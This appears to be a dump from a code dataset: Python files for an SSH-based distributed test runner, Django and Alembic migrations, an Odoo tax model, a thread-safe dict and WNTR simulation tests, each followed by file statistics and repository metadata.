        side fails to parse as an int), 0 when they are equal.  A longer
        version with equal leading components is the greater one
        (e.g. '1.2.1' > '1.2').
    """
    parts1 = v1.split('.')
    parts2 = v2.split('.')
    try:
        for i in range(len(parts1)):
            if len(parts2) < i + 1:
                # v1 has extra components and all shared ones were equal.
                return 1
            elif int(parts1[i]) < int(parts2[i]):
                return -1
            elif int(parts1[i]) > int(parts2[i]):
                return 1
    except ValueError:
        # Narrowed from a bare `except:`; only a non-numeric component
        # should map to -1 — a bare except also swallowed
        # KeyboardInterrupt/SystemExit.
        return -1
    if len(parts2) > len(parts1):
        return -1
    return 0
def generate_config_file(config_file):
    """
    Parse a key=value style configuration file into a dict.

    Blank lines and lines whose first character is '#' are skipped.
    Everything before the first '=' is the key, everything after it the
    value; both are stripped of surrounding whitespace, so values may
    themselves contain '=' characters.

    NOTE(review): Python 2 code (``except Exception, e`` and the print
    statement).  Any read/parse error prints a message and terminates
    the whole process via sys.exit().

    :param config_file: path of the configuration file to read
    :return: dict mapping configuration key -> value
    """
    config = {}
    try:
        f = open(config_file, 'r')
        lines = f.readlines()
        for line in lines:
            line = line.strip()
            if line and line[0] != '#':
                # Split on the first '=' only.
                config[line[:line.find('=')].strip()] = line[line.find('=') + 1:].strip()
            else:
                continue
        f.close()
    except Exception, e:
        print '[ERROR] Read config file %s error: %s' % (config_file, e)
        sys.exit()
    return config
def read_distribute_config(config_file='distribute_config.dat'):
    """
    Read and validate the distribute-mode configuration file.

    Comma-separated list values are normalised (spaces removed, doubled
    commas collapsed) and every required key is checked to be present
    and non-empty.

    :param config_file: path of the distribute configuration file
    :return: dict of validated configuration values
    :raises Exception: when a required key is present but empty
    """
    config = generate_config_file(config_file)
    # Normalise the comma-separated list values in place.
    for list_key in ('Slaves', 'Usernames', 'Passwords', 'Toolpaths',
                     'ToolNumberPerServer'):
        config[list_key] = config[list_key].replace(' ', '').replace(',,', ',')
    # Each of these must exist (KeyError otherwise) and be non-empty.
    for required_key in ('Master', 'Slaves', 'Usernames', 'Passwords',
                         'Toolpaths', 'ToolNumberPerServer', 'RunTime'):
        if not config[required_key]:
            raise Exception('Some config(s) is missed')
    return config
def generate_slave_servers(config):
    """
    Build one InitSSHRemoteHost per tool instance from the distribute config.

    'Slaves' and 'ToolNumberPerServer' are parallel comma-separated
    lists: slave i runs ToolNumberPerServer[i] tool instances.
    'Usernames'/'Passwords' are either per-slave lists or a single
    shared value.  'Toolpaths' holds one path per tool *instance*
    (indexed by the running counter k), not per slave.

    NOTE(review): Python 2 code (xrange).

    :param config: distribute configuration dict
    :return: list of InitSSHRemoteHost objects, one per tool instance
    """
    slaves = []
    slave_ips = config['Slaves'].split(',')
    slave_usernames = config['Usernames'].split(',')
    slave_passwords = config['Passwords'].split(',')
    slave_tool_paths = config['Toolpaths'].split(',')
    slave_tool_numbers = config['ToolNumberPerServer'].split(',')
    k = 0
    for i in xrange(len(slave_ips)):
        for j in xrange(int(slave_tool_numbers[i])):
            ip = slave_ips[i]
            # A single username/password is shared by all hosts; a list
            # is indexed per host.
            username = slave_usernames[i] if len(slave_usernames) > 1 else slave_usernames[0]
            password = slave_passwords[i] if len(slave_passwords) > 1 else slave_passwords[0]
            tool_path = slave_tool_paths[k]
            k += 1
            # Each generated host entry drives exactly one tool instance.
            tool_number = "1"
            slaves.append(InitSSHRemoteHost(ip, username, password, tool_path, tool_number))
    return slaves
def generate_connections(servers):
    """
    Open one long-lived SSH session per server and cd into its tool path.

    :param servers: list of InitSSHRemoteHost entries
    :return: list of LongSSHConnection objects, one per server
    """
    from long_ssh_connection import LongSSHConnection
    connects = []
    for server in servers:
        connect = LongSSHConnection(server)
        # build the connection to provided server
        logging.debug("Build connection to server[%s]" % server.localIP)
        r = connect.execute_cmd('ssh %s@%s' % (server.username, server.localIP), timeout=10)
        # A reply ending in '?' is the "continue connecting (yes/no)?"
        # host-key prompt: answer 'yes' and wait for the ':' of the
        # password prompt before sending the password.
        if r.endswith('?'):
            connect.execute_cmd('yes', expect_end=':')
        # expect_end='#' assumes a root shell prompt on the remote side.
        connect.execute_cmd(server.password, expect_end='#')
        logging.debug("Successfully built the connection to server[%s]" % server.localIP)
        # go to provided tool path
        logging.debug("Go to provided tool path[%s] of server[%s]" % (server.tools_path, server.localIP))
        connect.execute_cmd('cd %s' % server.tools_path, timeout=5)
        connects.append(connect)
    return connects
def get_brief_file_name(connect):
    """
    Return the name (without the 'result/' prefix) of the newest
    *_brief.txt file in the remote 'result' directory.

    :param connect: open connection exposing execute_cmd() and .ip
    :return: the brief file name, e.g. 'xxx_brief.txt'
    """
    # logging.warn is a deprecated alias of logging.warning; also use
    # lazy %-style arguments instead of eagerly formatting the message.
    logging.warning("try to get brief file from server: %s", connect.ip)
    get_slave_brief_file_name_result = connect.execute_cmd(r"ls -t result/*_brief.txt | head -1")
    # Remote output is CRLF-terminated; the first line holds the path.
    tmp = get_slave_brief_file_name_result.split('\r\n')[0]
    return tmp.split('/')[1]
def start_tool(connect, test_case, run_time):
    """
    Send the run signal ('python run.py <test_case>') to a slave server.

    NOTE(review): Python 2 code (print statement); the ``run_time``
    parameter is accepted but never used inside this function.

    :param connect: open connection exposing execute_cmd() and .ip
    :param test_case: test case identifier passed to run.py
    :param run_time: unused here (kept for the caller's signature)
    :return: None
    """
    print "Start at %s, send run signal to slave[%s]" % (time.strftime('%X %x %Z'), connect.ip)
    logging.warn("send run signal to server %s" % connect.ip)
    connect.execute_cmd('python run.py %s' % test_case, timeout=10)
def convert_time_format_str(time_sec):
    """Format a duration in seconds as a compact HH'MM'SS style string.

    Negative durations render as "--'--'--"; 99 days or more as
    '>99 days'; a day or more as "DD Days HH'MM'SS"; anything shorter as
    "HH'MM'SS.mmm" where mmm is milliseconds.

    :param time_sec: duration in seconds (int or float)
    :return: formatted duration string
    """
    if time_sec < 0:
        return '--\'--\'--'
    if time_sec >= 8553600:  # 99 * 86400 seconds = 99 days
        return '>99 days'
    elif time_sec >= 86400:
        return '%2.2d Days %2.2d\'%2.2d\'%2.2d' % (
            time_sec / (3600 * 24), time_sec % (3600 * 24) / 3600, (time_sec % 3600 / 60), (time_sec % 60))
    else:
        # Bug fix: the fractional seconds were computed against the
        # seconds-within-minute (time_sec % 60), which produced values
        # like 60.5 for any input >= 60 and a bogus huge "ms" for plain
        # int inputs.  The millisecond part is simply the fractional
        # part of the whole duration.
        ms = time_sec - int(time_sec)
        return '%2.2d\'%2.2d\'%2.2d.%d' % (time_sec / 3600, (time_sec % 3600 / 60), (time_sec % 60), ms * 1000)
def generate_response(response):
    """
    Strip the CRLF-terminated remainder from a raw server response.

    Server replies always contain "\r\n"; only the first line carries
    the payload, so everything after the first "\r\n" is discarded.

    :param response: raw response text from the server
    :return: the first line of the response
    :raises Exception: when *response* is None
    """
    if response is None:
        raise Exception("response of server is none, please confirm it.")
    return response.partition('\r\n')[0]
def convert_to_size_str(size_bt):
    """Render a byte count as a human-readable size string.

    Sizes of 100 PB or more collapse to '>100 PB'; everything else is
    shown with two decimals and the largest fitting binary unit.

    :param size_bt: size in bytes
    :return: formatted size string, e.g. '2.00 KB'
    """
    units = (
        ('PB', 2 ** 50),
        ('TB', 2 ** 40),
        ('GB', 2 ** 30),
        ('MB', 2 ** 20),
        ('KB', 2 ** 10),
    )
    if size_bt >= 100 * units[0][1]:
        return '>100 PB'
    for label, factor in units:
        if size_bt >= factor:
            return "%.2f %s" % (size_bt / (factor * 1.0), label)
    return "%.2f B" % size_bt
| 31.33452 | 126 | 0.588756 | 1,139 | 8,805 | 4.395961 | 0.197542 | 0.023367 | 0.024166 | 0.016777 | 0.199521 | 0.118634 | 0.079489 | 0.076693 | 0.066307 | 0.051927 | 0 | 0.028004 | 0.261897 | 8,805 | 280 | 127 | 31.446429 | 0.742422 | 0.009654 | 0 | 0.107527 | 0 | 0.026882 | 0.124968 | 0.005361 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.048387 | 0.053763 | null | null | 0.016129 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
42c17cddde41c241e9967ce5584459dfad76abef | 712 | py | Python | children/migrations/0002_remove_child_ssn.py | City-of-Helsinki/kukkuu | 61f26bc622928fd04f6a397f832aaffff789e806 | [
"MIT"
] | null | null | null | children/migrations/0002_remove_child_ssn.py | City-of-Helsinki/kukkuu | 61f26bc622928fd04f6a397f832aaffff789e806 | [
"MIT"
] | 157 | 2019-10-08T07:58:59.000Z | 2022-03-20T23:00:17.000Z | children/migrations/0002_remove_child_ssn.py | City-of-Helsinki/kukkuu | 61f26bc622928fd04f6a397f832aaffff789e806 | [
"MIT"
] | 3 | 2019-10-07T12:06:26.000Z | 2022-01-25T14:03:14.000Z | # Generated by Django 2.2.6 on 2019-10-15 19:17
import uuid
from django.db import migrations, models
class Migration(migrations.Migration):
    """Make the Child model's UUID the primary key and drop the SSN hash."""

    dependencies = [("children", "0001_initial")]

    operations = [
        # Promote the existing `uuid` field to serve as the `id` column.
        migrations.RenameField(model_name="child", old_name="uuid", new_name="id"),
        # Remove the stored hash of the social security number entirely.
        migrations.RemoveField(model_name="child", name="social_security_number_hash"),
        # Re-declare the renamed field as a non-editable UUID primary key.
        migrations.AlterField(
            model_name="child",
            name="id",
            field=models.UUIDField(
                default=uuid.uuid4,
                editable=False,
                primary_key=True,
                serialize=False,
                verbose_name="UUID",
            ),
        ),
    ]
| 27.384615 | 87 | 0.580056 | 73 | 712 | 5.506849 | 0.657534 | 0.067164 | 0.104478 | 0.089552 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.040486 | 0.30618 | 712 | 25 | 88 | 28.48 | 0.773279 | 0.063202 | 0 | 0.105263 | 1 | 0 | 0.111278 | 0.040602 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.105263 | 0 | 0.263158 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
42cbb8fbdb320bf4ee51a234482e61d5920e2af6 | 532 | py | Python | Task/Variadic-function/Python/variadic-function-4.py | LaudateCorpus1/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | 5 | 2021-01-29T20:08:05.000Z | 2022-03-22T06:16:05.000Z | Task/Variadic-function/Python/variadic-function-4.py | seanwallawalla-forks/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | null | null | null | Task/Variadic-function/Python/variadic-function-4.py | seanwallawalla-forks/RosettaCodeData | 9ad63ea473a958506c041077f1d810c0c7c8c18d | [
"Info-ZIP"
] | 1 | 2021-04-13T04:19:31.000Z | 2021-04-13T04:19:31.000Z | >>> def printargs(*positionalargs, **keywordargs):
print "POSITIONAL ARGS:\n " + "\n ".join(repr(x) for x in positionalargs)
print "KEYWORD ARGS:\n " + '\n '.join(
"%r = %r" % (k,v) for k,v in keywordargs.iteritems())
>>> printargs(1,'a',1+0j, fee='fi', fo='fum')
POSITIONAL ARGS:
1
'a'
(1+0j)
KEYWORD ARGS:
'fee' = 'fi'
'fo' = 'fum'
>>> alist = [1,'a',1+0j]
>>> adict = {'fee':'fi', 'fo':'fum'}
>>> printargs(*alist, **adict)
POSITIONAL ARGS:
1
'a'
(1+0j)
KEYWORD ARGS:
'fee' = 'fi'
'fo' = 'fum'
>>>
| 20.461538 | 76 | 0.541353 | 78 | 532 | 3.692308 | 0.346154 | 0.027778 | 0.041667 | 0.069444 | 0.277778 | 0.277778 | 0.277778 | 0.277778 | 0.277778 | 0.277778 | 0 | 0.028103 | 0.197368 | 532 | 25 | 77 | 21.28 | 0.64637 | 0 | 0 | 0.521739 | 0 | 0 | 0.171053 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0 | null | null | 0.217391 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
42ccf0a230dd6b60c0c66348fe16e98ae9ddaecc | 694 | py | Python | l10n_ar_ux/models/account_tax.py | odoo-mastercore/odoo-argentina | 58cdfe8610bae42f69ddb9d652a28eb3245f6a04 | [
"MIT"
] | 1 | 2021-01-25T15:57:58.000Z | 2021-01-25T15:57:58.000Z | l10n_ar_ux/models/account_tax.py | odoo-mastercore/odoo-argentina | 58cdfe8610bae42f69ddb9d652a28eb3245f6a04 | [
"MIT"
] | null | null | null | l10n_ar_ux/models/account_tax.py | odoo-mastercore/odoo-argentina | 58cdfe8610bae42f69ddb9d652a28eb3245f6a04 | [
"MIT"
] | 2 | 2020-10-17T16:36:02.000Z | 2021-01-24T10:20:05.000Z | ##############################################################################
# For copyright and license notices, see __manifest__.py file in module root
# directory
##############################################################################
from odoo import fields, models, api
class AccountTax(models.Model):
    """Extend account.tax with a jurisdiction code taken from its tags."""

    _inherit = 'account.tax'

    # Computed from the tags on the invoice repartition lines (below).
    jurisdiction_code = fields.Char(compute='_compute_jurisdiction_code')

    # NOTE(review): @api.depends() with no arguments declares no
    # dependencies — confirm the field is meant to be computed only on
    # creation / explicit recomputation.
    @api.depends()
    def _compute_jurisdiction_code(self):
        """Copy the jurisdiction code of the first tag that defines one."""
        for rec in self:
            tag = rec.invoice_repartition_line_ids.tag_ids.filtered(
                'jurisdiction_code')
            # False (not '') is Odoo's conventional "no value" for Char.
            rec.jurisdiction_code = tag[0].jurisdiction_code if tag else False
| 36.526316 | 78 | 0.54755 | 67 | 694 | 5.38806 | 0.641791 | 0.265928 | 0.127424 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00173 | 0.167147 | 694 | 18 | 79 | 38.555556 | 0.622837 | 0.121037 | 0 | 0 | 0 | 0 | 0.119734 | 0.05765 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.1 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
42d46cca79d20f9f9b601039b1b942c9aa61ea97 | 1,074 | py | Python | migrations/versions/d09db0106be9_.py | CSCfi/pebbles | 24b32e8fc538cc8095fda62c892a8221346c2bce | [
"MIT"
] | 4 | 2017-05-11T14:50:32.000Z | 2020-01-10T09:02:27.000Z | migrations/versions/d09db0106be9_.py | CSCfi/pebbles | 24b32e8fc538cc8095fda62c892a8221346c2bce | [
"MIT"
] | 145 | 2017-04-07T11:01:58.000Z | 2019-12-11T15:30:23.000Z | migrations/versions/d09db0106be9_.py | CSCfi/pebbles | 24b32e8fc538cc8095fda62c892a8221346c2bce | [
"MIT"
] | 3 | 2017-10-25T12:36:16.000Z | 2018-04-26T08:49:34.000Z | """remove cost multipliers.
Revision ID: d09db0106be9
Revises: 7d8f697053e9
Create Date: 2016-11-14 15:12:37.972365
"""
# revision identifiers, used by Alembic.
revision = 'd09db0106be9'
down_revision = '7d8f697053e9'
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
def upgrade():
    """Drop the cost-multiplier related columns from the blueprints table."""
    ### commands auto generated by Alembic - please adjust! ###
    op.drop_column('blueprints', 'maximum_lifetime')
    op.drop_column('blueprints', 'cost_multiplier')
    op.drop_column('blueprints', 'preallocated_credits')
    ### end Alembic commands ###
def downgrade():
    """Re-create the dropped columns (values are lost: all come back NULL)."""
    ### commands auto generated by Alembic - please adjust! ###
    op.add_column('blueprints', sa.Column('preallocated_credits', sa.BOOLEAN(), autoincrement=False, nullable=True))
    op.add_column('blueprints', sa.Column('cost_multiplier', postgresql.DOUBLE_PRECISION(precision=53), autoincrement=False, nullable=True))
    op.add_column('blueprints', sa.Column('maximum_lifetime', sa.INTEGER(), autoincrement=False, nullable=True))
    ### end Alembic commands ###
| 34.645161 | 140 | 0.739292 | 127 | 1,074 | 6.141732 | 0.448819 | 0.123077 | 0.046154 | 0.084615 | 0.298718 | 0.298718 | 0.264103 | 0.264103 | 0.151282 | 0.151282 | 0 | 0.057754 | 0.129423 | 1,074 | 30 | 141 | 35.8 | 0.776471 | 0.281192 | 0 | 0 | 0 | 0 | 0.251691 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.153846 | false | 0 | 0.230769 | 0 | 0.384615 | 0.461538 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
42dc064cc7cda2989742a61dea5eea2492ed422d | 5,020 | py | Python | gosubl/utils.py | charlievieth/GoSubl | 07dec6a5fef09e4e1d686cfe5d586edcda003381 | [
"MIT"
] | null | null | null | gosubl/utils.py | charlievieth/GoSubl | 07dec6a5fef09e4e1d686cfe5d586edcda003381 | [
"MIT"
] | 1 | 2020-11-06T22:01:04.000Z | 2020-11-06T22:01:04.000Z | gosubl/utils.py | charlievieth/GoSubl | 07dec6a5fef09e4e1d686cfe5d586edcda003381 | [
"MIT"
] | null | null | null | try:
from collections.abc import MutableMapping
except ImportError:
from collections import MutableMapping
from threading import Lock
class Counter:
    """A thread-safe monotonically increasing integer counter."""

    __slots__ = ("_guard", "_count")

    def __init__(self, value: int = 0) -> None:
        """Start counting from *value* (0 by default)."""
        self._count = value
        self._guard = Lock()

    def value(self) -> int:
        """Return the current count without modifying it."""
        with self._guard:
            return self._count

    def next(self) -> int:
        """Atomically advance the counter and return the new total."""
        with self._guard:
            self._count += 1
            return self._count

    def __repr__(self) -> str:
        # value() takes the lock itself, so no extra locking is needed.
        return f"Counter(value={self.value()})"
class ThreadSafeDict(MutableMapping):
    """A mutex-guarded dictionary.

    Each individual method call holds ``self.mutex`` for its duration.
    Compound operations that span several calls are NOT atomic, and
    iteration is deliberately unsupported (see __iter__).
    """

    def __init__(self, initialdata=None, /, **kwargs):
        """Create the dict, optionally seeded from *initialdata* and **kwargs.

        Bug fix: the original tested/updated from the builtin ``map``
        instead of the ``initialdata`` parameter, so every construction
        raised TypeError and the initial data was never applied.
        """
        self.mutex = Lock()
        self.data = {}
        if initialdata is not None:
            self.update(initialdata)
        if kwargs:
            self.update(kwargs)

    def __len__(self):
        with self.mutex:
            return len(self.data)

    def __getitem__(self, key):
        with self.mutex:
            return self.data.__getitem__(key)

    def __setitem__(self, key, item):
        with self.mutex:
            self.data[key] = item

    def __delitem__(self, key):
        with self.mutex:
            del self.data[key]

    def __iter__(self):
        # An iterator would escape the mutex, so handing one out can
        # never be made safe; refuse instead of pretending.
        raise NotImplementedError(
            "Iteration over this class is unlikely to be threadsafe."
        )

    # Modify __contains__ to work correctly when __missing__ is present
    def __contains__(self, key):
        with self.mutex:
            return key in self.data

    # Now, add the methods in dicts but not in MutableMapping
    def __repr__(self):
        with self.mutex:
            return repr(self.data)

    def __eq__(self, other):
        # Bug fix: without this guard, comparing an instance to itself
        # tried to acquire the same non-reentrant Lock twice (deadlock).
        if other is self:
            return True
        with self.mutex:
            if isinstance(other, ThreadSafeDict):
                with other.mutex:
                    return self.data == other.data
            else:
                return self.data == other

    def __or__(self, other):
        with self.mutex:
            if isinstance(other, ThreadSafeDict):
                with other.mutex:
                    return self.__class__(self.data | other.data)
            if isinstance(other, dict):
                return self.__class__(self.data | other)
            return NotImplemented

    def __ror__(self, other):
        with self.mutex:
            if isinstance(other, ThreadSafeDict):
                with other.mutex:
                    return self.__class__(other.data | self.data)
            if isinstance(other, dict):
                return self.__class__(other | self.data)
            return NotImplemented

    def __ior__(self, other):
        with self.mutex:
            if isinstance(other, ThreadSafeDict):
                with other.mutex:
                    self.data |= other.data
            else:
                self.data |= other
        return self

    def __copy__(self):
        with self.mutex:
            inst = self.__class__.__new__(self.__class__)
            inst.__dict__.update(self.__dict__)
            # Create a copy and avoid triggering descriptors
            inst.__dict__["data"] = self.__dict__["data"].copy()
            # Bug fix: the copy used to share the original's Lock, so a
            # later original-vs-copy comparison deadlocked on it.
            inst.__dict__["mutex"] = Lock()
            return inst

    def get(self, key, default=None):
        with self.mutex:
            return self.data.get(key, default)

    # Sentinel distinguishing "no default supplied" from default=None.
    __marker = object()

    def pop(self, key, default=__marker):
        with self.mutex:
            if default is self.__marker:
                return self.data.pop(key)
            else:
                return self.data.pop(key, default)

    def clear(self):
        with self.mutex:
            self.data.clear()

    def popitem(self):
        with self.mutex:
            return self.data.popitem()

    def update(self, other=(), /, **kwds):
        """Merge *other* (mapping or iterable of pairs) and **kwds.

        Bug fix: **kwds used to be accepted but silently ignored.
        """
        with self.mutex:
            if isinstance(other, ThreadSafeDict):
                with other.mutex:
                    self.data.update(other.data)
            else:
                self.data.update(other)
            if kwds:
                self.data.update(kwds)

    def setdefault(self, key, default=None):
        with self.mutex:
            return self.data.setdefault(key, default)

    # WARN: not performant — returns a full snapshot.
    def keys(self):
        with self.mutex:
            return list(self.data.keys())

    # WARN: not performant — returns a full snapshot.
    def items(self):
        with self.mutex:
            return list(self.data.items())

    # WARN: not performant — returns a full snapshot.
    def values(self):
        # Bug fix: this was the only snapshot accessor missing the mutex.
        with self.mutex:
            return list(self.data.values())

    def copy(self):
        """Return a shallow copy of this dict."""
        if self.__class__ is ThreadSafeDict:
            with self.mutex:
                return ThreadSafeDict(self.data.copy())
        # Subclass path: snapshot first, then build the copy WITHOUT
        # holding our mutex — copy.copy()/update() re-acquire it, which
        # deadlocked on this non-reentrant Lock in the original.
        with self.mutex:
            snapshot = self.data.copy()
        import copy
        data = self.data
        try:
            # Temporarily detach the payload so copy.copy stays cheap.
            self.data = {}
            c = copy.copy(self)
        finally:
            self.data = data
        c.update(snapshot)
        return c

    @classmethod
    def fromkeys(cls, iterable, value=None):
        """Build a new dict with keys from *iterable*, each set to *value*."""
        d = cls()
        for key in iterable:
            d[key] = value
        return d
| 27.431694 | 71 | 0.551195 | 549 | 5,020 | 4.786885 | 0.205829 | 0.091324 | 0.098935 | 0.065068 | 0.392694 | 0.297945 | 0.236682 | 0.236682 | 0.179604 | 0.179604 | 0 | 0.000618 | 0.355378 | 5,020 | 182 | 72 | 27.582418 | 0.811496 | 0.063944 | 0 | 0.330935 | 0 | 0 | 0.021994 | 0.006193 | 0 | 0 | 0 | 0 | 0 | 1 | 0.201439 | false | 0 | 0.035971 | 0.014388 | 0.467626 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
42de2c67ea39fb1c4011156619ee111bdbf7f161 | 4,596 | py | Python | wntr/tests/test_times.py | yejustme/WNTR | 4228853c84217392b57e99c486e878ddf7959bbd | [
"BSD-3-Clause"
] | null | null | null | wntr/tests/test_times.py | yejustme/WNTR | 4228853c84217392b57e99c486e878ddf7959bbd | [
"BSD-3-Clause"
] | null | null | null | wntr/tests/test_times.py | yejustme/WNTR | 4228853c84217392b57e99c486e878ddf7959bbd | [
"BSD-3-Clause"
] | null | null | null | import unittest
from os.path import abspath, dirname, join
testdir = dirname(abspath(str(__file__)))
test_datadir = join(testdir,'networks_for_testing')
ex_datadir = join(testdir,'..','..','examples','networks')
#class TestNetworkTimeWarnings(unittest.TestCase):
#
# @classmethod
# def setUpClass(self):
# import wntr
# self.wntr = wntr
#
# @classmethod
# def tearDownClass(self):
# pass
#
# def test_pattern_start_time(self):
# inp_file = join(test_datadir, 'net_test_8.inp')
# wn = self.wntr.network.WaterNetworkModel()
# parser = self.wntr.network.ParseWaterNetwork()
#
# flag = False
# with warnings.catch_warnings(record=True) as w:
# warnings.simplefilter("always")
# parser.read_inp_file(wn, inp_file)
# for message in w:
# if str(message.message) == 'Currently, only the EpanetSimulator supports a non-zero patern start time.':
# flag = True
# self.assertEqual(flag, True)
#
# #def test_report_time_step(self):
# # inp_file = join(test_datadir, 'net_test_9.inp')
# # wn = self.wntr.network.WaterNetworkModel()
# # parser = self.wntr.network.ParseWaterNetwork()
# #
# # flag = False
# # with warnings.catch_warnings(record=True) as w:
# # warnings.simplefilter("always")
# # parser.read_inp_file(wn, inp_file)
# # for message in w:
# # if str(message.message) == 'Currently, only a the EpanetSimulator supports a report timestep that is not equal to the hydraulic timestep.':
# # flag = True
# # self.assertEqual(flag, True)
#
# def test_report_start_time(self):
# inp_file = join(test_datadir, 'net_test_10.inp')
# wn = self.wntr.network.WaterNetworkModel()
# parser = self.wntr.network.ParseWaterNetwork()
#
# flag = False
# with warnings.catch_warnings(record=True) as w:
# warnings.simplefilter("always")
# parser.read_inp_file(wn, inp_file)
# for message in w:
# if str(message.message) == 'Currently, only the EpanetSimulator supports a non-zero report start time.':
# flag = True
# self.assertEqual(flag, True)
#
# def test_start_clocktime(self):
# inp_file = join(test_datadir, 'net_test_11.inp')
# wn = self.wntr.network.WaterNetworkModel()
# parser = self.wntr.network.ParseWaterNetwork()
#
# flag = False
# with warnings.catch_warnings(record=True) as w:
# warnings.simplefilter("always")
# parser.read_inp_file(wn, inp_file)
# for message in w:
# if str(message.message) == 'Currently, only the EpanetSimulator supports a start clocktime other than 12 am.':
# flag = True
# self.assertEqual(flag, True)
class TestNetworkTimeBehavior(unittest.TestCase):
    """Checks WNTRSimulator time handling against the times.inp fixture.

    The fixture appears to use a 24h + 3h05m duration with a 1h05m
    (3900 s) report step — TODO confirm against times.inp.
    """

    # NOTE(review): setUpClass/tearDownClass name their parameter `self`
    # instead of the conventional `cls`; behavior is identical.
    @classmethod
    def setUpClass(self):
        # Run the simulation once and share the results across tests.
        import wntr
        self.wntr = wntr
        inp_file = join(test_datadir, 'times.inp')
        wn = self.wntr.network.WaterNetworkModel(inp_file)
        sim = self.wntr.sim.WNTRSimulator(wn)
        self.results = sim.run_sim()

    @classmethod
    def tearDownClass(self):
        pass

    def test_duration(self):
        """26 report steps; the last index is 24h + 3h + 5min in seconds."""
        results = self.results
        self.assertEqual(len(results.node['head'].index), 26)
        self.assertEqual(results.node['head'].index[25], 24*3600+3*3600+5*60)

    def test_report_timestep(self):
        """Consecutive report indices are 1h05m (3900 s) apart."""
        results = self.results
        self.assertEqual((results.node['head'].index[1] - results.node['head'].index[0]), 1*3600+5*60)

    def test_pattern_timestep(self):
        """junction1 demand is constant; junction2 follows a repeating pattern.

        t/3900 counts report steps; the pattern repeats every 8 steps and
        each demand level holds for two consecutive steps (hence the
        paired `x%8 == v or (x-1)%8 == v` tests).
        """
        results = self.results
        for t in results.node['demand'].index:
            self.assertEqual(results.node['demand'].at[t, 'junction1'], 1.0)
            total_seconds = t
            if (total_seconds/3900.0)%8 == 0.0 or ((total_seconds/3900.0)-1)%8 == 0.0:
                self.assertEqual(results.node['demand'].at[t, 'junction2'], 0.5)
            elif (total_seconds/3900.0)%8 == 2.0 or ((total_seconds/3900.0)-1)%8 == 2.0:
                self.assertEqual(results.node['demand'].at[t, 'junction2'], 1.0)
            elif (total_seconds/3900.0)%8 == 4.0 or ((total_seconds/3900.0)-1)%8 == 4.0:
                self.assertEqual(results.node['demand'].at[t, 'junction2'], 1.5)
            elif (total_seconds/3900.0)%8 == 6.0 or ((total_seconds/3900.0)-1)%8 == 6.0:
                self.assertEqual(results.node['demand'].at[t, 'junction2'], 1.0)
if __name__ == '__main__':
unittest.main()
| 39.62069 | 153 | 0.613795 | 567 | 4,596 | 4.839506 | 0.204586 | 0.035714 | 0.049198 | 0.049563 | 0.787172 | 0.748542 | 0.668732 | 0.608601 | 0.552478 | 0.517857 | 0 | 0.034523 | 0.25 | 4,596 | 115 | 154 | 39.965217 | 0.761532 | 0.546997 | 0 | 0.179487 | 0 | 0 | 0.076885 | 0 | 0 | 0 | 0 | 0 | 0.205128 | 1 | 0.128205 | false | 0.025641 | 0.076923 | 0 | 0.230769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
42e345f904e2768c1e66e371528c325498939f5e | 1,069 | py | Python | snownlp/seg/seg.py | wuxqing/snownlp | 4595942d042c3fb36d187787cdb021ad1fd935e8 | [
"MIT"
] | 1 | 2020-08-04T07:56:12.000Z | 2020-08-04T07:56:12.000Z | snownlp/seg/seg.py | wuxqing/snownlp | 4595942d042c3fb36d187787cdb021ad1fd935e8 | [
"MIT"
] | null | null | null | snownlp/seg/seg.py | wuxqing/snownlp | 4595942d042c3fb36d187787cdb021ad1fd935e8 | [
"MIT"
